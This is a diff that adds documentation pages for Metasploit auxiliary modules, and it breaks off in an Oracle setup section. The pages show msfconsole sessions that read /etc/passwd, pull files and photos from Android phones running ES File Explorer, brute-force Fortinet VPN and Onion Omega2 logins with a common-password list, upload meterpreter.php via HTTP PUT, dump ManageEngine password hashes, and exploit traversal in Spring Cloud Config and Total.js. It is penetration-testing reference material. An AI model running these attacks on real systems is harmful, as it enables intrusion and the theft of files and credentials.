+   TARGET_FILE  /etc/passwd      yes       The absolute path of remote file to read.
+   VHOST                         no        HTTP server virtual host
+
+msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost
+RHOSTS => localhost
+msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000
+RPORT => 8000
+smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo
+ROUTE => /demo
+msf5 auxiliary(gather/rails_doubletap_file_read) > run
+[*] Running module against 127.0.0.1
+
+[+] Target is vulnerable!
+[*] Requesting file /etc/passwd
+[+] Response from server:
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+...snip...
+systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+
+[*] Auxiliary module execution completed  
+```
@@ -0,0 +1,28 @@
+This module provides a port of Daniel Mende's (released under the BSD license) gtp-scan.py utility. It brings the ability to scan for GPRS servers to Metasploit via sending GTP-U v1 and v2 echo requests.
+
+## Vulnerable Application
+
+Open-source GGSN implementations can be used as a target for this module as well as commercial GPRS gear. For information on one project suitable as a target, see [OsmoGGSN](https://osmocom.org/projects/openggsn/wiki/OsmoGGSN).
+
+## Options
+
+   **The RPORT option**
+
+   This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.
+
+## Scenarios
+
+```
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > set RHOSTS 192.168.28.200-192.168.28.208
+RHOSTS => 192.168.28.200-192.168.28.208
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > run
+
+[*] [2019.04.22-16:38:27] Sending probes to 192.168.28.200->192.168.28.208 (9 hosts)
+[+] [2019.04.22-16:38:42] GTP v1 echo response received from: 192.168.28.200:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.201:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.207:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.208:2152
+[*] [2019.04.22-16:38:43] Scanned 9 of 9 hosts (100% complete)
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) >
+```
@@ -17,7 +17,7 @@ These instructions will create a web sever using `apache` with directory listing

 #### Note 

-ake sure you dont have an `index.html` file in your `/var/www/html` for the vulnerability to work.
+Make sure you dont have an `index.html` file in your `/var/www/html` for the vulnerability to work.


 ## Verification Steps
@@ -0,0 +1,263 @@
+## Vulnerable Application
+
+  ES File Explorer has an HTTP server that runs and accepts 
+  certain commands. The HTTP server is started on app launch, and is 
+  available as long as the app is open. ES File Explorer launches as
+  a service in the background on device boot. Version 4.1.9.7.4 and below 
+  are reported vulnerable. This module has been tested against 
+  [4.1.9.5.1](https://www.apkmirror.com/apk/es-global/es-file-explorer/es-file-explorer-4-1-9-5-1-release/).
+
+  This module includes all functionality from the original [POC](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln)
+  except for the `getAppThumbnail` command.
+
+  Available actions:
+
+ *  **APPLAUNCH**       Launch an app. ACTIONITEM required.
+ *  **GETDEVICEINFO**   Get device info
+ *  **GETFILE**         Get a file from the device. ACTIONITEM required.
+ *  **LISTAPPS**        List all the apps installed
+ *  **LISTAPPSALL**     List all the apps installed
+ *  **LISTAPPSPHONE**   List all the phone apps installed
+ *  **LISTAPPSSDCARD**  List all the apk files stored on the sdcard
+ *  **LISTAPPSSYSTEM**  List all the system apps installed
+ *  **LISTAUDIOS**      List all the audio files
+ *  **LISTFILES**       List all the files on the sdcard
+ *  **LISTPICS**        List all the pictures
+ *  **LISTVIDEOS**      List all the videos
+
+  Not all of the information from the commands is printed to screen, however the origin JSON
+  content is stored in loot for reference.
+
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use modules/auxiliary/scanner/http/es_file_explorer_open_port```
+  4. Do: ```run```
+  5. You should get device information
+
+## Options
+
+  **ACTION**
+
+  The action to perform.  See description in Vulnerable Application section for additional details.  Default is `GETDEVICEINFO`.
+
+  **ACTIONITEM**
+
+  If running `APPLAUNCH` or `GETFILE`, this is the app to launch or file to download.
+
+## Scenarios
+
+### ES File Explorer 4.1.9.5.1 on a Dragon Touch Y88X on Android 4.4
+
+```
+resource (es.rb)> use modules/auxiliary/scanner/http/es_file_explorer_open_port
+resource (es.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (es.rb)> set action GETDEVICEINFO
+action => GETDEVICEINFO
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - Name: Y88X
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTFILES
+action => LISTFILES
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  folder: bootloader (0.00 Bytes) - 3/23/2019 10:36:51 AM
+  folder: databk (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: sdcard (4.00 KB) - 3/23/2019 02:15:24 PM
+  folder: storage (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: config (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: cache (4.00 KB) - 3/24/2019 07:37:46 AM
+  folder: acct (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: vendor (4.00 KB) - 1/31/2015 05:56:49 AM
+  folder: d (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: etc (4.00 KB) - 2/3/2015 03:51:06 AM
+  folder: mnt (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  file: ueventd.sun8i.rc (1.18 KB) - 12/31/1969 07:00:00 PM
+  file: ueventd.rc (3.93 KB) - 12/31/1969 07:00:00 PM
+  folder: system (4.00 KB) - 12/31/1969 07:00:00 PM
+  folder: sys (0.00 Bytes) - 3/23/2019 10:36:45 AM
+  file: sepolicy (73.82 KB) - 12/31/1969 07:00:00 PM
+  file: seapp_contexts (656.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: sbin (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: res (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: property_contexts (2.11 KB) - 12/31/1969 07:00:00 PM
+  folder: proc (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: nand.ko (1.47 MB) - 12/31/1969 07:00:00 PM
+  file: initlogo.rle (2.34 MB) - 12/31/1969 07:00:00 PM
+  file: init.usb.rc (3.82 KB) - 12/31/1969 07:00:00 PM
+  file: init.trace.rc (1.75 KB) - 12/31/1969 07:00:00 PM
+  file: init.sunxi.wifi.bt.rc (1010.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init.sun8i.usb.rc (3.40 KB) - 12/31/1969 07:00:00 PM
+  file: init.sun8i.rc (4.67 KB) - 12/31/1969 07:00:00 PM
+  file: init.recovery.sun8i.rc (97.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init.rc (23.12 KB) - 12/31/1969 07:00:00 PM
+  file: init.environ.rc (919.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init (183.40 KB) - 12/31/1969 07:00:00 PM
+  file: fstab.sun8i (1.64 KB) - 12/31/1969 07:00:00 PM
+  file: file_contexts (9.03 KB) - 12/31/1969 07:00:00 PM
+  file: default.prop (116.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: data (4.00 KB) - 3/23/2019 10:36:52 AM
+  file: charger (274.11 KB) - 12/31/1969 07:00:00 PM
+  folder: root (0.00 Bytes) - 1/31/2015 05:24:35 AM
+  folder: dev (2.62 KB) - 3/23/2019 10:37:14 AM
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTVIDEOS
+action => LISTVIDEOS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  DragonTouch-text.mp4 (55.30 MB) - 1/20/1970 10:18:53 PM: /storage/emulated/0/Movies/DragonTouch-text.mp4
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAUDIOS
+action => LISTAUDIOS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Calendar Notification.ogg (52.89 KB) - 8/6/2015 08:15:30 PM: /storage/emulated/0/Notifications/Calendar Notification.ogg
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSSYSTEM
+action => LISTAPPSSYSTEM
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+  com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSPHONE
+action => LISTAPPSPHONE
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+  com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
+  Mobile Data (com.android.phone) Version: 4.4.2-20150203
+  Calculator (com.android.calculator2) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Face Unlock (com.android.facelock) Version: 4.4.2-940549
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSSDCARD
+action => LISTAPPSSDCARD
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSALL
+action => LISTAPPSALL
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  com.android.keyguard (com.android.keyguard) Version: 4.4.2-20150203
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Face Unlock (com.android.facelock) Version: 4.4.2-940549
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTPICS
+action => LISTPICS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  IMG_20190323_165608.jpg (140.06 KB) - 3/23/2019 04:56:08 PM: /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action GETFILE
+action => GETFILE
+resource (es.rb)> set actionitem /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+actionitem => /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg saved to /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPS
+action => LISTAPPS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
+  Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
+  Phone (com.andriod.phone) Version: 1.0
+  Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
+  Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
+  Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
+  com.softwinner.videotest (com.softwinner.videotest) Version: 1.0
+  APUS (com.apusapps.launcher) Version: 2.3.1
+  Settings (com.android.system.io.settings) Version: 11.1.0
+  DragonPhone (com.softwinner.dragonphone) Version: 1.0
+  com.mediatek.touch (com.mediatek.touch) Version: 21_zh80001
+  Google Play Store (com.android.vending) Version: 13.9.17-all [0] [PR] 236777123
+  com.android.google.settings (com.android.google.settings) Version: 17_zh10317
+  MainActivity (com.metasploit.stage) Version: 1.0
+  Gmail (com.google.android.gm) Version: 8.6.3.200445973.release
+  L-Uninstall (com.clear.uninstall) Version: 2.0
+  ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1
+  DragonFire-v2.3 (com.softwinner.dragonfire) Version: 2.3 release
+  YouTube (com.google.android.youtube) Version: 13.23.59
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action APPLAUNCH
+action => APPLAUNCH
+resource (es.rb)> set actionitem com.android.chrome
+actionitem => com.android.chrome
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - com.android.chrome launched successfully
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> loot
+
+Loot
+====
+
+host           service  type                 name                                                     content                   info  path
+----           -------  ----                 ----                                                     -------                   ----  ----
+1.1.1.1        getDeviceInfo.json   es_file_explorer_getdeviceinfo.json                      application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_getDeviceInfo.js_744272.bin
+1.1.1.1        listFiles.json       es_file_explorer_listfiles.json                          application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listFiles.json_522563.bin
+1.1.1.1        listVideos.json      es_file_explorer_listvideos.json                         application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listVideos.json_623335.bin
+1.1.1.1        listAudio.json       es_file_explorer_listaudio.json                          application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listAudio.json_331531.bin
+1.1.1.1        listAppsSystem.json  es_file_explorer_listappssystem.json                     application/json                /root/.msf4/loot/20190324073821_default_1.1.1.1_listAppsSystem.j_581712.bin
+1.1.1.1        listAppsPhone.json   es_file_explorer_listappsphone.json                      application/json                /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsPhone.js_773512.bin
+1.1.1.1        listAppsSdcard.json  es_file_explorer_listappssdcard.json                     application/json                /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsSdcard.j_543396.bin
+1.1.1.1        listAppsAll.json     es_file_explorer_listappsall.json                        application/json                /root/.msf4/loot/20190324073854_default_1.1.1.1_listAppsAll.json_886297.bin
+1.1.1.1        listPics.json        es_file_explorer_listpics.json                           application/json                /root/.msf4/loot/20190324073855_default_1.1.1.1_listPics.json_831055.bin
+1.1.1.1        getFile              /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg  application/octet-stream        /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
+1.1.1.1        listApps.json        es_file_explorer_listapps.json                           application/json                /root/.msf4/loot/20190324073856_default_1.1.1.1_listApps.json_189709.bin
+```
@@ -0,0 +1,40 @@
+This module tests credentials on Fortinet SSL VPN servers (FortiGate).
+
+NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
+When the server cannot be verified the module stops working.
+The realm/domain is used for every request when set.
+
+The module supports IPv6 requests.
+The module supports several hosts at the same time.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+IP-Addresses have been masked with x
+
+```
+msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
+
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 1 of 2 hosts (50% complete)
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,60 @@
+## Description 
+This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/http_put```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set PATH [PATH]```
+5. Do: ```set FILENAME [FILNAME]```
+6. Do: ```set FILEDATA [PATH]```
+7. Do: ```run```
+
+## Options 
+
+### ACTION
+
+Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
+
+**PUT**
+
+Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.
+
+**DELETE** 
+
+Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE. 
+
+### PATH
+
+The path at which this module will attempt to either PUT the content or DELETE it.
+
+### FILEDATA
+
+The content to put in the uploaded file when `ACTION` is set to `PUT`.
+
+
+## Scenarios
+
+Here `ACTION` is by default set to `PUT`.
+
+```
+msf > use auxiliary/scanner/http/http_put
+msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
+RHOSTS => 1.1.1.23
+msf auxiliary(scanner/http/http_put) > set RPORT 8585
+RPORT => 8585
+msf auxiliary(scanner/http/http_put) > set PATH /uploads
+PATH => /uploads
+msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
+FILENAME => meterpreter.php
+msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
+FILEDATA => file://root/Desktop/meterpreter.php
+msf auxiliary(scanner/http/http_put) > run 
+
+[+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/http_put) >
+```
+ 
@@ -0,0 +1,20 @@
+## Description
+
+  This module scans a JBoss instance for a few vulnerabilities.
+
+## Vulnerable Software
+
+  The JBoss Enterprise Application Platform (or JBoss EAP) is a
+  subscription-based/open-source Java EE-based application
+  server runtime platform used for building, deploying, and
+  hosting highly-transactional Java applications and services
+
+  This module has been successfully tested on:
+
+  * Apache-Coyote/1.1 ( Powered by Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBoss_4_2_0_GA date=200705111440)/Tomcat-5.5 )
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/jboss_vulnscan```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
@@ -0,0 +1,62 @@
+## Decription
+
+  This module extracts usernames and salted MD5 password hashes
+  from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
+
+
+## Vulnerable Software
+
+  [DeviceExpert](http://www.manageengine.com/products/device-expert) is a
+  web–based, multi-vendor network configuration and change management (NCCM)
+  solution for switches, routers, firewalls and other network devices.
+
+  This module has been tested successfully on DeviceExpert
+  version 5.9.7 build 5970 on Windows XP SP3.
+
+  Software download:
+
+  * [5.8 build 5850](http://web.archive.org/web/20130123070454/http://www.manageengine.com/products/device-expert/download.html)
+  * [5.9 build 5900](http://web.archive.org/web/20130304043822/http://www.manageengine.com/products/device-expert/download.html)
+  * [5.9 build 5950](http://web.archive.org/web/20131029082827/http://www.manageengine.com/products/device-expert/download.html)
+
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/manageengine_deviceexpert_user_creds```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
+  4. You should receive usernames and associated password hashes + salts
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds 
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131
+  rhosts => 172.16.158.131
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check
+  [+] 172.16.158.131:6060 - The target is vulnerable.
+  [*] Checked 1 of 1 hosts (100% complete)
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run
+
+  [*] 172.16.158.131:6060 - Found weak credentials (admin:admin)
+
+  ManageEngine DeviceExpert User Credentials
+  ==========================================
+
+   Username  Password  Password Hash                     Role           E-mail                Password Salt
+   --------  --------  -------------                     ----           ------                -------------
+   admin     admin     3a4ebf16a4795ad258e5408bae7be341  Administrator  noreply@zohocorp.com  12345678
+
+  [*] Credentials saved in: /Users/jvazquez/.msf4/loot/20140926165907_default_172.16.158.131_manageengine.dev_118155.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131
+  Credentials
+  ===========
+
+  host            service           public  private  realm  private_type
+  ----            -------           ------  -------  -----  ------------
+  172.16.158.131  6060/tcp (https)  admin   admin           Password
+  ```
+
@@ -0,0 +1,72 @@
+## Description
+The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.
+
+## Vulnerable Application
+* Onion Omage2 HTTPd Service
+
+![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)
+
+![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)
+
+## Verification Steps
+1. Plug your Onion Omega2 device to a power source. 
+    - First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
+2. Connect to its Wi-Fi network.
+3. Start `msfconsole`
+4. Do: `use auxiliary/scanner/http/onion_omega2_login`
+5. Do: `set RHOSTS 192.168.3.1`
+6. Do: `set USERPASS_FILE <user pass dictionary>`
+    - username and password seperated by space and one pair per line.
+7. Do: `run`
+
+Sample userpass file:
+```text
+root 123456
+root password
+root 123456789
+root 12345678
+root 12345
+root 10601
+root qwerty
+root 123123
+root 111111
+root abc123
+root 1234567
+root dragon
+root 1q2w3e4r
+root sunshine
+root 654321
+root master
+```
+
+## Scenario 
+```
+msf5 > use auxiliary/scanner/http/onion_omega2_login
+msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
+RHOSTS => 192.168.3.1
+msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
+USERPASS_FILE => something.txt
+msf5 auxiliary(scanner/http/onion_omega2_login) > run
+
+[*] Running for 192.168.3.1...
+[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
+[!] No active DB -- Credential data will not be saved!
+[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
+[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
+[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
+[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
+[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
+[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
+[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
+[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
+[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
+[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
+[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
+[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
+[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
+[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
+[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
+[*] 192.168.3.1:80 - [16/16] - root:master - Failure
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,35 @@
+## Description 
+This module scrapes data from a specific web page based on a regular expression.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/scraper```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Options
+
+### PATH 
+
+The path from where the data is to be scraped from.
+ 
+### PATTERN
+
+A regular expression to capture data from webpage. Default value:`<title>(.*)</title>` which simply grabs the page title.
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/scraper
+msf auxiliary(scanner/http/scraper) > set RHOSTS 1.1.1.18
+RHOSTS => 1.1.1.18
+msf auxiliary(scanner/http/scraper) > run 
+
+[+] 1.1.1.18 / [Index of /]
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/scraper) >
+```
+
+The title of `1.1.1.18/` page is `Index of /`.
+
@@ -0,0 +1,35 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
+Spring Cloud Config listens by default on port 8888.
+
+### Vulnerable Application
+
+* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/springcloud_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
+
+```
+msf > use auxiliary/scanner/http/springcloud_traversal 
+msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
+RHOSTS => 192.168.1.132
+msf auxiliary(scanner/http/springcloud_traversal) > run
+
+[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/springcloud_traversal) >
+```
+
+## References
+
+* https://pivotal.io/security/cve-2019-3799
@@ -0,0 +1,60 @@
+## Description
+
+This module check and exploits a Directory Traversal vulnerability in Total.js framework < 3.2.4 (CVE-2019-8903). Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml, woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache, manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic.
+
+## Vulnerable Application
+
+Affecting total.js package, versions:
+
+* >=2.1.0 <2.1.1
+* >=2.2.0 <2.2.1
+* >=2.3.0 <2.3.1
+* >=2.4.0 <2.4.1
+* >=2.5.0 <2.5.1
+* >=2.6.0 <2.6.3
+* >=2.7.0 <2.7.1
+* >=2.8.0 <2.8.1
+* >=2.9.0 <2.9.5
+* >=3.0.0 <3.0.1
+* >=3.1.0 <3.1.1
+* >=3.2.0 <3.2.4
+
+## Verification Steps
+
+1. On a Node v8 environment do: `npm install total.js@3.2.3`
+2. Install an app on top of the Total.js framework, something like [Total.js CMS](https://github.com/totaljs/cms)
+  * `git clone https://github.com/totaljs/cms.git`
+  * `cd cms && npm install`
+3. Start `msfconsole`
+4. `use auxiliary/scanner/http/totaljs_traversal`
+5. `set RHOST <IP>`
+6. `set RPORT <PORT>`
+7. `run`
+8. Verify you get Total.js version if the target is vulnerable!
+
+## Options
+
+* **TARGETURI**: Path to Total.js App installation (“/” is the default)
+* **DEPTH**: Traversal depth (“1” is the default)
+* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+
+## Scenario
+
+### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
+
+```
+msf5 > use auxiliary/scanner/http/totaljs_traversal 
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59
+RHOST => 192.168.2.59
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320
+RPORT => 8320
+msf5 auxiliary(scanner/http/totaljs_traversal) > run
+[*] Running module against 192.168.2.59
+
+[*] Total.js version is: ^3.2.0
+[*] App name: CMS
+[*] App description: A simple and powerful CMS solution written in Total.js / Node.js.
+[*] App version: 12.0.0
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/totaljs_traversal) >
+```
@@ -0,0 +1,173 @@
+## Preparation: 6 steps
+
+  1. Oracle DB XE (Express Edition) can be downloaded for free [here](https://www.oracle.com/technetwork/database/database-technologies/express-edition/downloads/index.html).
+  2. Install Oracle Database and create a database. Versions 8i through 12c are supported.
